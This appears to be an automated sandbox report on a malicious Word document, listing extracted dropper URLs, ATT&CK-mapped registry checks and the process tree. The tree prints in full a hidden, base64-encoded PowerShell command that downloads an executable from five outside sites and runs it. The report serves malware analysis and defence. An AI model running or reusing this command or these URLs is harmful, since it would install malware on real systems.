4b1021cbf9b30925f479bb668745f2326edac3d2edf2fcb25f364a0d748fbc40

General

Target

4b1021cbf9b30925f479bb668745f2326edac3d2edf2fcb25f364a0d748fbc40.doc
Sample

200128-8mnxhl5zhx
SHA256

4b1021cbf9b30925f479bb668745f2326edac3d2edf2fcb25f364a0d748fbc40

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://earlingramjr.com/wp-admin/jMVDLv8/

exe.dropper

http://empower4talent.com/calendar/uf475/

exe.dropper

http://emyrs-eg.lehmergroup.com/YaePG8Heh9/

exe.dropper

http://expressdocuments.org/egxoii/fO852/

exe.dropper

http://fastagindia.hapus.app/cgi-bin/IJ/

Signatures

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

4928 WINWORD.EXE
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

WINWORD.EXE

pid process

4928 WINWORD.EXE

pid	process
4928	WINWORD.EXE

pid	process
4928	WINWORD.EXE

Process spawned unexpected child process 1 IoCs

Processes:

Powershell.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3656	1312	Powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

Powershell.exe

description pid process

Token: SeDebugPrivilege 3656 Powershell.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

Powershell.exe

pid process

3656 Powershell.exe

description	pid	process
Token: SeDebugPrivilege	3656	Powershell.exe

pid	process
3656	Powershell.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\4b1021cbf9b30925f479bb668745f2326edac3d2edf2fcb25f364a0d748fbc40.doc" /o ""
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Checks processor information in registry
- Enumerates system info in registry
PID:4928

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -w hidden -en JABHAHIAcQBwAGsAaQB1AHkAdAA9ACcAQQByAGYAdgBsAGcAdABrAG8AcgBiAGMAcQAnADsAJABQAHAAcwBoAGgAbgBvAHIAdgBoAHYAcQBvACAAPQAgACcAMwA5ACcAOwAkAE0AbQBxAGMAcgBkAHgAcgBoAHkAaABiAD0AJwBSAHoAYQBpAG4AdwBtAGEAdgBvAHgAZAAnADsAJABJAHUAbAB0AGYAeABkAHgAeQBvAHcAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFAAcABzAGgAaABuAG8AcgB2AGgAdgBxAG8AKwAnAC4AZQB4AGUAJwA7ACQARQBvAGEAcABsAG0AaQBsAGMAZQBpAD0AJwBOAG8AbgB6AHIAdAB0AGEAYgBiAGkAbgAnADsAJABOAGwAaQB1AHAAaAB6AHYAeQA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBFAHQALgBXAGUAQgBjAEwAaQBFAG4AVAA7ACQAQgBjAG8AZQB4AHYAZABzAGUAYQBmAD0AJwBoAHQAdABwADoALwAvAGUAYQByAGwAaQBuAGcAcgBhAG0AagByAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBqAE0AVgBEAEwAdgA4AC8AKgBoAHQAdABwADoALwAvAGUAbQBwAG8AdwBlAHIANAB0AGEAbABlAG4AdAAuAGMAbwBtAC8AYwBhAGwAZQBuAGQAYQByAC8AdQBmADQANwA1AC8AKgBoAHQAdABwADoALwAvAGUAbQB5AHIAcwAtAGUAZwAuAGwAZQBoAG0AZQByAGcAcgBvAHUAcAAuAGMAbwBtAC8AWQBhAGUAUABHADgASABlAGgAOQAvACoAaAB0AHQAcAA6AC8ALwBlAHgAcAByAGUAcwBzAGQAbwBjAHUAbQBlAG4AdABzAC4AbwByAGcALwBlAGcAeABvAGkAaQAvAGYATwA4ADUAMgAvACoAaAB0AHQAcAA6AC8ALwBmAGEAcwB0AGEAZwBpAG4AZABpAGEALgBoAGEAcAB1AHMALgBhAHAAcAAvAGMAZwBpAC0AYgBpAG4ALwBJAEoALwAnAC4AIgBzAGAAUABsAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEwAcgBiAGYAbgB3AGoAbQBzAHkAPQAnAEUAbQBnAHgAdwBhAHAAYwB5AG0AaQAnADsAZgBvAHIAZQBhAGMAaAAoACQAQwB0AGEAZABlAGoAZABoAHUAawB5AG8AIABpAG4AIAAkAEIAYwBvAGUAeAB2AGQAcwBlAGEAZgApAHsAdAByAHkAewAkAE4AbABpAHUAcABoAHoAdgB5AC4AIgBkAGAATwBXAG4AYABMAGAAbwBBAGQARgBpAEwAZQAiACgAJABDAHQAYQBkAGUAagBkAGgAdQBrAHkAbwAsACAAJABJAHUAbAB0AGYAeABkAHgAeQBvAHcAKQA7ACQASgBuAG4AZABtAHMAYgBpAGQAPQAnAEIAeQB1AGIAawBiAHYAcABoAGIAcABnACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQASQB1AGwAdABmAHgAZAB4AHkAbwB3ACkALgAiAEwAYABFAGAATgBnAFQASAAiACAALQBnAGUAIAAzADUANwA3ADkAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBUAGAAQQBSAHQAIgAoACQASQB1AGwAdABmAHgAZAB4AHkAbwB3ACkAOwAkAEkAeAB6AGsAeQBqAG0AegBkAD0AJwBKAGYAZwBxAGgAYgBwAG0AdwB4AGYAbwBzACcAOwBiAHIAZQBhAGsAOwAkAFQAaABkAHUAaABzAHkAaABrAGQAaQA9ACcASwBvAHoAcgBzAG8AcwBxAGoAcgB0AG8AcQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABIAGMAaQBoAG4AaABxAGYAdgA9ACcAQwBrAHgAdgBtAHkAaQByACcA
1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3656

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads